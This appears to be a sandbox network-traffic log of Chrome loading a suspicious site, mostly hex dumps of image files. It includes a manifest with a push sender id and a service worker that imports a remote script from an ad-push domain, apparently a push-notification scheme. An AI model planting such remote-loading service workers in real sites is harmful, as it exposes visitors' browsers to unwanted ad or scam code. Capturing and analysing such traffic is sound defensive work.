                                                          2023-11-27 03:23:53 UTC835OUTGET /yufapeso/yeje/sudulexu/rocalibu/zo/images/a-favicon.ico HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC704INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 33 38 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 31 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 35 37 36 65 2d 36 30 38 39 30 32 66 30 38 65 65 30 38 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: image/vnd.microsoft.iconContent-Length: 22382Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:17 GMTETag: "576e-608902f08ee08"Cache-Control: max-age=14400CF-Cache-Status
                                                          2023-11-27 03:23:53 UTC665INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 9e 04 00 00 40 40 00 00 01 00 20 00 28 42 00 00 46 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 58 88 88 88 a5 88 88 88 4a 88
                                                          Data Ascii: h6 @@ (BF( XJ
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 c0 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 5d 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 55 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 f8 88 88 88 34 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 76 88 88 88 ec 88 88 88 f2 88 88 88 88 88 88 88 32 88 88 88 74 88 88 88 ee 88 88 88 f6 88 88 88 a2 88 88 88 13 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 0f 88 88 88 14 88 88 88 00 88 88 88 48 88 88 88 39 88 88 88 0e 88 88 88 19 88 88 88 00 88 88 88 00 ff ff
                                                          Data Ascii: ]U4v2tH9
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 f3 88 88 88 d7 88 88 88 e0 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 86 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 02 88 88 88 ba 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 5d 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 76 88 88 88 ff 88 88 88
                                                          Data Ascii: ]v
                                                          2023-11-27 03:23:53 UTC1369INData Raw: ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 e4 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 43 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 cb 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 73 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00
                                                          Data Ascii: Cs
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 61 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 31 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 51 88 88 88 db 88 88 88 ff 88 88 88 65 88 88 88 00 88
                                                          Data Ascii: a1Qe
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff
                                                          Data Ascii:
                                                          2023-11-27 03:23:53 UTC1369INData Raw: ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff
                                                          Data Ascii:
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 88 88 00 88 88 88 00 88 88 88 00 88 88 88 67 88 88 88 fc 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 fa 88 88 88 bf 88 88 88 89 88 88 88 71 88 88 88 6d 88 88 88 7c 88 88 88 a6 88 88 88 e7 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ad 88 88 88 0d 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 00
                                                          Data Ascii: gqm|
                                                          2023-11-27 03:23:53 UTC1369INData Raw: 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ae 88 88 88 00 88 88 88 00 88 88 88 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 ff ff ff 00 88 88 88 00 88 88 88 00 88 88 88 00 88 88 88 10 88 88 88 dd 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88 88 88 ff 88
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.549753104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC668OUTGET /service_worker.js HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          Cache-Control: max-age=0
                                                          Accept: */*
                                                          Service-Worker: script
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: same-origin
                                                          Sec-Fetch-Dest: serviceworker
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC723INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 34 39 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 35 36 2d 36 30 38 39 30 33 30 65 62 33 61 35 61 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:49 GMTETag: W/"56-6089030eb3a5a-gzip"Vary: Accept-EncodingCache-Control:
                                                          2023-11-27 03:23:53 UTC92INData Raw: 35 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 70 75 73 68 6c 69 74 65 2e 6e 65 70 74 75 6e 65 61 64 73 70 75 73 68 2e 63 6f 6d 2f 6a 61 76 61 73 63 72 69 70 74 73 2f 73 65 72 76 69 63 65 5f 77 6f 72 6b 65 72 2e 6a 73 3f 76 31 27 29 3b 0d 0a
                                                          Data Ascii: 56importScripts('https://pushlite.neptuneadspush.com/javascripts/service_worker.js?v1');
                                                          2023-11-27 03:23:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.549752104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC591OUTGET /manifest.json HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: manifest
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2023-11-27 03:23:53 UTC664INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 32 32 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 32 61 2d 36 30 38 39 30 32 66 35 31 61 65 66 38 22 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: application/jsonContent-Length: 42Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:22 GMTETag: "2a-608902f51aef8"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To:
                                                          2023-11-27 03:23:53 UTC42INData Raw: 7b 20 20 20 0d 0a 20 20 22 67 63 6d 5f 73 65 6e 64 65 72 5f 69 64 22 3a 20 22 33 32 35 33 37 37 36 39 32 38 38 31 22 0d 0a 7d
                                                          Data Ascii: { "gcm_sender_id": "325377692881"}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.549754172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC502OUTGET /people/4.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC700INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 30 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 33 65 64 2d 36 30 38 39 30 32 66 63 34 66 61 37 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 35 37 38
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: image/jpegContent-Length: 1005Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "3ed-608902fc4fa7d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4578
                                                          2023-11-27 03:23:53 UTC669INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8d 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 01 07 01 00 03 01 01 01 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
                                                          2023-11-27 03:23:53 UTC336INData Raw: 79 e8 52 fc 8f 5f 8b 7c c4 9b 09 07 69 7d 3a 95 1f 35 cd 0c ce 63 73 c2 66 eb 36 eb 2a db c9 f3 66 23 ce 77 11 c7 de 31 db e6 d0 0b 74 57 a1 33 08 b8 ed 2c 6a 98 3b b5 71 97 69 b3 fa d6 53 b7 fd af 86 f7 d0 9c fa 76 4f f6 63 e3 ef 78 47 1f 6a eb f6 a1 6b aa 64 ff 00 8b 09 19 18 33 12 48 1d 98 94 e3 2c 75 82 83 0b 41 e2 c2 db 86 b5 24 b4 1b 45 f7 82 a1 f2 d9 4b b2 02 33 42 d2 e7 1f bd 3f 0c b8 08 89 e6 df 50 f6 87 58 4a ca 56 bc 8a 1a 72 1e 12 bc 68 05 56 f3 99 25 2c 0c 06 fb 5c 06 a5 3e 49 9b 1e d7 1e 16 8b ca 81 9a 8d c5 8f 91 ee ab a8 49 d5 41 a0 21 8c 92 92 61 28 99 e2 e6 87 10 e1 51 f8 ad 27 94 27 c8 45 31 9f 31 24 70 c9 0b 1c c6 17 10 dc 58 88 35 b6 f2 b2 cf 36 92 9b c4 6a 9e d1 a9 5f 43 3d c9 2d 2e 2f 89 eb 5f 54 e5 ff 00 ea 8a fa f8 8d eb 42 f3 2a
                                                          Data Ascii: yR_|i}:5csf6*f#w1tW3,j;qiSvOcxGjkd3H,uA$EK3B?PXJVrhV%,\>IIA!a(Q''E11$pX56j_C=-./_TB*


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.549755172.67.151.1834434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:53 UTC502OUTGET /people/2.jpg HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0; _TRKPushSubscriberID=150f9b3d-ac91-dc19-3aa7-6e036ac79d42
                                                          2023-11-27 03:23:53 UTC698INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 35 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 33 30 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 34 62 63 2d 36 30 38 39 30 32 66 63 35 30 61 31 64 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 67 65 3a 20 34 34 39 32
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:53 GMTContent-Type: image/jpegContent-Length: 1212Connection: closeLast-Modified: Wed, 25 Oct 2023 20:20:30 GMTETag: "4bc-608902fc50a1d"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 4492
                                                          2023-11-27 03:23:53 UTC671INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 10 0b 0b 0b 0c 0b 10 0c 0c 10 17 0f 0d 0f 17 1b 14 10 10 14 1b 1f 17 17 17 17 17 1f 1e 17 1a 1a 1a 1a 17 1e 1e 23 25 27 25 23 1e 2f 2f 33 33 2f 2f 40 40 40 40 40 40 40 40 40 40 40 40 40 40 40 01 11 0f 0f 11 13 11 15 12 12 15 14 11 14 11 14 1a 14 16 16 14 1a 26 1a 1a 1c 1a 1a 26 30 23 1e 1e 1e 1e 23 30 2b 2e 27 27 27 2e 2b 35 35 30 30 35 35 40 40 3f 40 40 40 40 40 40 40 40 40 40 40 40 ff c0 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 8a 00 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 05 06 04 02 07 01 01 01 01 01 01 00 00 00 00 00
                                                          Data Ascii: ExifII*DuckyAdobed#%'%#//33//@@@@@@@@@@@@@@@&&0##0+.'''.+550055@@?@@@@@@@@@@@@22"
